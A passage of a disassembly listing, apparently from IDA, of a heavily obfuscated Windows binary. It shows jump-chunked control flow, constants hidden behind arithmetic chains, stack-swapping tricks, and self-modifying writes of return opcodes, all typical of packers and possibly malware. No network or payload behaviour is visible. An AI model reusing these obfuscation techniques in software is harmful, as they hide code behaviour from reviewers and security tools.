		mov	ds:dword_41E188, eax
		lea	eax, nullsub_6
		jmp	loc_4460C6
; ---------------------------------------------------------------------------

loc_44A7D2:				; DATA XREF: y2kk37jd:00453D22o
		push	esi
		push	0B163A921h
		pop	esi
		sub	esi, 0D724F8E3h
		jnz	loc_45204F
; START	OF FUNCTION CHUNK FOR sub_43D8B6

loc_44A7E5:				; CODE XREF: sub_43D8B6+Fj
		jmp	loc_43C7EE
; END OF FUNCTION CHUNK	FOR sub_43D8B6
; ---------------------------------------------------------------------------
		cmp	ebx, 55EEB067h
		jmp	loc_4474ED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44A7F6:				; CODE XREF: y2kk37jd:0044A373j
		jmp	sub_445DF5
; ---------------------------------------------------------------------------

locret_44A7FB:				; CODE XREF: y2kk37jd:00442183j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448770

loc_44A7FC:				; CODE XREF: sub_448770+B27Bj
		jmp	loc_44857F
; END OF FUNCTION CHUNK	FOR sub_448770
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44A801:				; CODE XREF: sub_4448E2+99F5j
		jl	loc_444486
		add	ebx, edi
		cmp	ebp, 0A4715829h
		jmp	loc_443C18
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_44A814:				; CODE XREF: y2kk37jd:loc_4501D5j
					; y2kk37jd:00455E86j
		push	dword ptr [ebp+10h]
		push	dword ptr [ebp+0Ch]
		push	dword ptr [ebp+8]
		call	eax
		jmp	loc_450AF7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44A824:				; CODE XREF: sub_45B7AA:loc_45B812j
		push	edx
		push	0A9AA4F8Eh
		pop	edx
		rol	edx, 0Bh
		jmp	loc_4572B7
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E456

loc_44A833:				; CODE XREF: sub_43E456+Dj
		xchg	eax, [esp+8+var_8]
		mov	ebx, eax
		pop	eax
		add	ebx, 82FE30D5h
		rol	ebx, 15h
		sub	ebx, 60E75F53h
		or	ebx, 243D2B87h
		jmp	loc_44E9F2
; END OF FUNCTION CHUNK	FOR sub_43E456
; ---------------------------------------------------------------------------
		popf
		jmp	sub_43D41D
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_44A85A:				; CODE XREF: y2kk37jd:0043E0BAj
		jmp	loc_453D3F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_12. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C304

loc_44A860:				; CODE XREF: sub_44C304-6CBj
		jmp	loc_451530
; END OF FUNCTION CHUNK	FOR sub_44C304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF88

loc_44A865:				; CODE XREF: sub_43BF88+1Bj
		jmp	loc_4467D8
; END OF FUNCTION CHUNK	FOR sub_43BF88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_44A86A:				; CODE XREF: sub_459158-1A5EAj
					; sub_454413+51F8j
		mov	eax, [ebp-4]
		push	eax
		call	sub_445DF5
		jmp	loc_455B79
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		mov	eax, [ebp-4]
		push	eax
		jmp	loc_43DEC7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44A881:				; CODE XREF: sub_453867:loc_43CD5Fj
		and	edx, 482CB04Dh
		xor	edx, 3920960Ah
		add	edx, ebp
		call	sub_43BFAE
; END OF FUNCTION CHUNK	FOR sub_453867
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_44A894:				; CODE XREF: sub_43CA5B+1575Dj
		cmp	eax, ebp
		jmp	loc_447E58
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------

loc_44A89B:				; CODE XREF: y2kk37jd:0043F5F3j
		test	ebp, ecx

loc_44A89D:				; CODE XREF: y2kk37jd:loc_44EE16j
		jmp	loc_457274
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_44A8A2:				; CODE XREF: sub_43BD3D+7j
		xor	esi, 0B8EDD322h
		add	esi, 2114E87Ah
		xchg	esi, [esp+0]
		jmp	loc_456839
; END OF FUNCTION CHUNK	FOR sub_43BD3D

; =============== S U B	R O U T	I N E =======================================



sub_44A8B6	proc near		; DATA XREF: sub_448C53:loc_44F394o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C8FF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043CFCE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044375B SIZE 00000005 BYTES

		push	0FA4ECE4Ah
		xchg	esi, [esp+4+var_4]
		mov	eax, esi
		pop	esi
		rol	eax, 1Eh
		add	eax, 6DFF91h
		sub	eax, 36B1DAD8h
		jmp	loc_44375B
sub_44A8B6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44948A

loc_44A8D5:				; CODE XREF: sub_44948A+13j
					; sub_45B7AA+9Fj
		or	ebx, 85713F2Ch
		sub	ebx, 57CF3AC4h
		add	ebx, 0C09531CFh
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45435D
; END OF FUNCTION CHUNK	FOR sub_44948A
; ---------------------------------------------------------------------------
		mov	ds:off_41E010, eax
		lea	eax, loc_452281
		mov	byte ptr [eax],	0C3h
		jmp	loc_452281

; =============== S U B	R O U T	I N E =======================================



sub_44A903	proc near		; CODE XREF: sub_41A4A1+53p
					; sub_41A4A1+8Ep ...

; FUNCTION CHUNK AT 00445C3A SIZE 00000006 BYTES

		call	sub_445C40
		jmp	loc_445C3A
sub_44A903	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44A90D:				; CODE XREF: sub_43F75D:loc_45BD9Dj
		pop	edx
		lea	eax, nullsub_18
		call	sub_45A891

loc_44A919:				; DATA XREF: sub_457533:loc_44BCD5o
		ror	eax, 0Dh
		mov	ds:dword_44D2E4, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44A923:				; CODE XREF: sub_4480CB-647Cj
		jmp	loc_44ACE0
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457533

loc_44A928:				; CODE XREF: sub_457533-924Fj
		rol	eax, 0Dh
		push	edi
		mov	edi, eax
		jmp	loc_4493E7
; END OF FUNCTION CHUNK	FOR sub_457533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44A933:				; CODE XREF: sub_453867:loc_454A88j
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		jmp	loc_43C2CD
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_44A93D:				; CODE XREF: y2kk37jd:0045754Fj
		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_22
		mov	byte ptr [eax],	0C3h
		mov	[ebp-4], eax
		push	esi
		jmp	loc_43DC47
; ---------------------------------------------------------------------------

loc_44A952:				; CODE XREF: y2kk37jd:loc_44F8D9j
		pop	ebx
		rol	ebx, 0Ah
		add	ebx, 8253689Dh
		popf
		jmp	loc_45A9F5
; ---------------------------------------------------------------------------

loc_44A962:				; CODE XREF: y2kk37jd:0043EC55j
		jz	nullsub_168

loc_44A968:				; CODE XREF: y2kk37jd:loc_44C90Cj
		mov	ecx, [ebp-20h]
		push	ebx
		push	87C2AB35h
		pop	ebx
		xor	ebx, 8986C11Ch
		and	ebx, 0A09ED938h
		xor	ebx, 15D72E29h
		jmp	loc_43F6F8
; ---------------------------------------------------------------------------

loc_44A989:				; DATA XREF: sub_44310A:loc_447AA1o
		call	sub_45405E
		mov	edx, 0A2CD59D9h
		call	sub_455DD8
		mov	ds:dword_44FC84, eax
		retn
; ---------------------------------------------------------------------------

loc_44A99E:				; DATA XREF: y2kk37jd:loc_44B80Ao
		push	0C210C033h
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44A9A4:				; CODE XREF: sub_44001E:loc_456650j
		sub	eax, 9FDB26AFh
		add	eax, 5CEA1973h
		xor	eax, 7F1FB2F7h
		xchg	eax, [esp+10h+var_10]
		push	0
		push	eax
		jmp	loc_45414C
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------

loc_44A9C1:				; CODE XREF: y2kk37jd:0043B838j
		call	sub_442C3E
		push	edi
		push	52B6E39Eh
		pop	edi
		rol	edi, 10h
		jmp	loc_44A5EF
; ---------------------------------------------------------------------------

loc_44A9D5:				; CODE XREF: y2kk37jd:loc_43CA56j
		jnz	loc_4511CF
		jmp	loc_44F665
; ---------------------------------------------------------------------------

loc_44A9E0:				; CODE XREF: y2kk37jd:004551BBj
		xor	edi, 9B488BCEh
		add	edi, ebp
		add	edi, 57AAC621h
		push	offset sub_45070F
		jmp	loc_43D94D
; ---------------------------------------------------------------------------

loc_44A9F8:				; CODE XREF: y2kk37jd:0044824Aj
		shl	edx, 1Ah
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_44A9FB:				; CODE XREF: sub_44113A:loc_44822Fj
		xor	eax, 375BB02Bh
		add	eax, ebp
		add	eax, 1713F02Ah
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4440D1
		jmp	loc_43FBFF
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------
		jg	loc_450CCB
		jmp	loc_4569F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44AA24:				; CODE XREF: sub_43EF4F+Cj
		jz	loc_43E5ED
		jmp	loc_45BC54
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44AA2F:				; CODE XREF: sub_453867-4E3Dj
		adc	eax, ebp
		mov	esi, [eax]
		jmp	loc_43F510
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_44AA38:				; CODE XREF: y2kk37jd:00450E02j
		jnp	loc_44E13A
		ja	loc_4587BE
		pushf
		jmp	loc_45BE89

; =============== S U B	R O U T	I N E =======================================



sub_44AA4A	proc near		; CODE XREF: y2kk37jd:0043C64Cj
					; sub_4490CB+62BBp

; FUNCTION CHUNK AT 00446F4B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA85 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045830D SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_44D2D8
		or	eax, eax
		jnz	loc_44BA85

loc_44AA5F:				; CODE XREF: sub_4458DD:loc_453E0Cj
		jmp	loc_446F4B
sub_44AA4A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, eax
		jmp	sub_45BE0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_44AA6B:				; CODE XREF: sub_442A84:loc_451A68j
		add	eax, 510C8332h
		call	sub_4441FF

loc_44AA76:				; CODE XREF: sub_43C851+1B484j
		jmp	loc_448560
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_44AA7B:				; CODE XREF: sub_43F0A5+8j
		jmp	loc_45BADA
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107E

loc_44AA80:				; CODE XREF: sub_44107E-3B82j
		jmp	loc_43FFB2
; END OF FUNCTION CHUNK	FOR sub_44107E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44AA85:				; CODE XREF: sub_43F75D:loc_441AC2j
		jnz	loc_43C597
		jmp	loc_43F6C0
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_44AA90:				; CODE XREF: y2kk37jd:00447999j
		js	loc_4400DD

; =============== S U B	R O U T	I N E =======================================



sub_44AA96	proc near		; CODE XREF: sub_4408B9+7p

; FUNCTION CHUNK AT 00456822 SIZE 0000000C BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, edx
		jmp	loc_456822
sub_44AA96	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44AAA1	proc near		; DATA XREF: sub_44A6E9-1E1Ao

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043E021 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043F55C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F590 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004438EC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004465D7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00447C93 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0044893F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448B7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF84 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D95B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E4C8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451664 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045208F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452AED SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452DFA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00453AC7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00456297 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458209 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BC1C SIZE 00000017 BYTES

		add	edx, ebp
		add	edx, 5AE167E8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_452E0B
		jmp	loc_43F55C
sub_44AAA1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585C4

loc_44AABA:				; CODE XREF: sub_4585C4:loc_458D9Aj
		mov	edx, eax
		push	eax
		push	405244AFh
		xchg	ebx, [esp+8+var_8]
		mov	eax, ebx
		pop	ebx
		add	eax, 31CD8D12h
		jnb	loc_44736A

loc_44AAD4:				; CODE XREF: y2kk37jd:0044FA3Fj
		jmp	loc_45ADE2
; END OF FUNCTION CHUNK	FOR sub_4585C4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DCA

loc_44AAD9:				; CODE XREF: sub_448DCA+4BEj
		jmp	loc_44DFB6
; END OF FUNCTION CHUNK	FOR sub_448DCA
; ---------------------------------------------------------------------------
		dw 0CF2Bh
		dd 123C8A0Fh, 70E90001h, 81FFFFF4h, 516313F6h, 0E9D1F775h
		dd 0FFFF4C65h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_44AAF8:				; CODE XREF: sub_43E25A+1C551j
		mov	eax, ds:dword_4516F4
		or	eax, eax
		jnz	loc_45728F
		jmp	loc_456938
; END OF FUNCTION CHUNK	FOR sub_43E25A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44AB0B:				; CODE XREF: sub_43BD0D+6943j
		sub	esi, 1ACD13ECh
		jnb	loc_4483DC

loc_44AB17:				; CODE XREF: sub_44918E+12A33j
		jmp	loc_45B49E
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------

loc_44AB1C:				; CODE XREF: y2kk37jd:0044EF57j
		jmp	loc_45C42C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44AB21:				; CODE XREF: sub_445226-473j
		jmp	loc_44B241
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D522

loc_44AB26:				; CODE XREF: sub_43D522+3j
		jmp	loc_454DFA
; END OF FUNCTION CHUNK	FOR sub_43D522
; ---------------------------------------------------------------------------
		pushf
		jle	loc_447EF3
		jmp	loc_447176
; ---------------------------------------------------------------------------

loc_44AB37:				; CODE XREF: y2kk37jd:0043E96Aj
		jz	locret_44F91A
		test	ecx, ebx
		jmp	loc_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457042

loc_44AB44:				; CODE XREF: sub_457042-2805j
		pushf
		push	8C63ADE7h
		pop	eax
		and	eax, 0ACE9C17Ah
		xor	eax, 1BCF541Ch
		add	eax, 6894F7C2h
		popf
		jmp	loc_45B4DE
; END OF FUNCTION CHUNK	FOR sub_457042
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459E88

loc_44AB63:				; CODE XREF: sub_459E88+Dj
		sub	ecx, 3B973943h
		jnz	loc_43BDDA
; END OF FUNCTION CHUNK	FOR sub_459E88
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_44AB6F:				; CODE XREF: sub_4415B8+160B3j
		jmp	loc_459901
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------
		jbe	loc_447A29
		xor	eax, edx
		sub	edi, 11D58F73h
		jmp	loc_43BDD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A298

loc_44AB87:				; CODE XREF: sub_44A298+17j
		add	edx, 88A040F3h
		xchg	edx, [esp+0]
		jmp	loc_44D0C6
; END OF FUNCTION CHUNK	FOR sub_44A298

; =============== S U B	R O U T	I N E =======================================



sub_44AB95	proc near		; DATA XREF: sub_44B03F+712Co

; FUNCTION CHUNK AT 00440FA1 SIZE 00000005 BYTES

		push	0B9B8C75Eh
		pop	esi
		rol	esi, 2
		add	esi, 591761B4h
		sub	esi, 0C0F04417h
		xor	esi, 0E8A0C91Fh
		add	esi, 68992F66h
		xchg	esi, [esp+0]
		jmp	loc_440FA1
sub_44AB95	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44ABBE:				; CODE XREF: sub_45B7AA:loc_445DC5j
		mov	edx, ebp
		xchg	edx, [esp+0]
		mov	ebp, edx
		xchg	ebp, [esp+0]
		call	sub_4464B3
		mov	eax, 524E554Eh
		call	sub_442C3E
		push	esi
		jmp	loc_440F44
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_44ABDD:				; CODE XREF: sub_451A35-15CA9j
		push	2F0AF865h
		xor	ecx, 0ECFAF3C6h
		jmp	loc_4577CA
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44ABED:				; CODE XREF: sub_45B7AA:loc_44E783j
		jnz	loc_4533E7
		jmp	loc_4530BC
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456FFB

loc_44ABF8:				; CODE XREF: sub_456FFB:loc_45259Fj
		rol	edi, 0Ah
		or	edi, 23906C85h
		rol	edi, 1Ch
		add	edi, 2605512Bh
		xchg	edi, [esp+0]
		jmp	sub_43C326
; END OF FUNCTION CHUNK	FOR sub_456FFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_44AC12:				; CODE XREF: sub_43C865:loc_44F8D4j
		mov	ds:dword_43BEC8, eax
; END OF FUNCTION CHUNK	FOR sub_43C865
; START	OF FUNCTION CHUNK FOR sub_43D41D

loc_44AC18:				; CODE XREF: sub_43D41D+6j
					; sub_4552EB:loc_442281j
		xor	eax, 8D3EA2Fh
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+0]
		push	47B87310h
		xchg	edi, [esp+4+var_4]
		jmp	loc_45657B
; END OF FUNCTION CHUNK	FOR sub_43D41D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452C88

loc_44AC31:				; CODE XREF: sub_452C88+4682j
		push	edx
		mov	edx, eax
		xchg	edx, [esp+4+var_4]
		mov	eax, edx
		jmp	sub_441AAB
; END OF FUNCTION CHUNK	FOR sub_452C88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44704D

loc_44AC3E:				; CODE XREF: sub_44704D:loc_456488j
		xor	eax, eax
		mov	[ebp-0Ch], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_459FF4
		call	sub_44A33C

loc_44AC52:				; CODE XREF: sub_44C87D+Cj
		jmp	loc_446C6B
; END OF FUNCTION CHUNK	FOR sub_44704D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44AC57:				; CODE XREF: sub_445226+7950j
		add	edx, ebp
		add	edx, 0BFA5BE58h
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_4565E1
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_44AC68:				; CODE XREF: y2kk37jd:00457099j
		shl	esi, 16h
		sbb	eax, ebx
; START	OF FUNCTION CHUNK FOR sub_442DDC

loc_44AC6D:				; CODE XREF: sub_442DDC:loc_45707Ej
		push	offset loc_45076E
		jmp	loc_445A5B
; END OF FUNCTION CHUNK	FOR sub_442DDC

; =============== S U B	R O U T	I N E =======================================



sub_44AC77	proc near		; DATA XREF: sub_44B0D0-E52Eo

; FUNCTION CHUNK AT 004470D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448E96 SIZE 00000006 BYTES

		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44F2EC

loc_44AC84:				; CODE XREF: sub_44107E+D3B6j
		jmp	loc_4470D4
sub_44AC77	endp


; =============== S U B	R O U T	I N E =======================================



sub_44AC89	proc near		; CODE XREF: y2kk37jd:004520A2j
					; sub_455299+7p

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043B8AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CAC8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D90C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DBF7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043DC37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F467 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F577 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004401D0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00440A75 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442AAA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442D25 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004433B3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004442F5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044457F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444625 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445685 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445DA6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446783 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044689C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00447201 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00447ABD SIZE 00000027 BYTES
; FUNCTION CHUNK AT 004492EB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF1D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E22D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E6D9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00451352 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004513E5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452635 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452AA2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00453066 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004545E2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454CF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455488 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004563C5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00456580 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004569E9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457C48 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045863C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045975F SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00459829 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A5E5 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	2C155B7Ah
		pop	edx
		jmp	loc_451352
sub_44AC89	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, 0CE3062ECh
		push	esi
		mov	esi, ecx
		xchg	esi, [esp]
		push	0EA5BEFCDh
		pop	ecx
		jmp	loc_4469B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4436E7

loc_44ACAE:				; CODE XREF: sub_4436E7:loc_44D6D8j
		rol	ebx, 18h
		add	ebx, 0C7A5A696h
		push	offset loc_4472C9
		jmp	sub_4415D8
; END OF FUNCTION CHUNK	FOR sub_4436E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453583

loc_44ACC1:				; CODE XREF: sub_453583-C5C4j
		test	edi, 20h
		jmp	loc_441759
; END OF FUNCTION CHUNK	FOR sub_453583
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45136B

loc_44ACCC:				; CODE XREF: sub_45136B-F3EEj
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44267A
		jmp	loc_45BD69
; END OF FUNCTION CHUNK	FOR sub_45136B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4480CB

loc_44ACE0:				; CODE XREF: sub_4480CB:loc_44A923j
		or	ecx, ecx

loc_44ACE2:				; CODE XREF: sub_45919E:loc_452898j
		call	sub_45380A

loc_44ACE7:				; CODE XREF: y2kk37jd:004490AFj
		jp	loc_449161
		xor	edx, 767B616Ch

loc_44ACF3:				; CODE XREF: sub_4447EA:loc_4523B8j
		add	edi, 485F3080h
		xchg	edi, [esp+4+var_4]
		jmp	sub_4464B3
; END OF FUNCTION CHUNK	FOR sub_4480CB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44AD01:				; CODE XREF: sub_4507BF:loc_446238j
		shr	ebp, 1Fh
		sbb	ebp, 81EC2308h
		jmp	loc_445697
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_44AD0F:				; CODE XREF: sub_44610D+BF17j
		jnp	nullsub_315
		sbb	eax, 5E83445Dh
		jmp	loc_45438C
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_45494E
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_452C88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44AD2D:				; CODE XREF: sub_4507BF:loc_44C176j
		jz	loc_451E48
		jmp	loc_454200
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

locret_44AD38:				; CODE XREF: y2kk37jd:0044836Fj
		retn
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_44AD3A:				; CODE XREF: y2kk37jd:0044E70Aj
		jmp	loc_44711D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_44AD3F:				; CODE XREF: sub_45447D-68CFj
		jmp	loc_447C55
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------

loc_44AD44:				; CODE XREF: y2kk37jd:00447860j
		jmp	sub_448DCA

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44AD49	proc near		; CODE XREF: y2kk37jd:0043CD9Cp
					; y2kk37jd:00440068j ...

var_400		= byte ptr -400h
var_104		= dword	ptr -104h
var_100		= dword	ptr -100h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043BE9F SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044158C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004421F1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00443D61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B21 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004479DE SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00447D5A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7EA SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451E40 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004541FB SIZE 0000000A BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFEF8h
		mov	[ebp+var_104], eax
		mov	[ebp+var_100], 276E6143h
		jmp	loc_447D5A
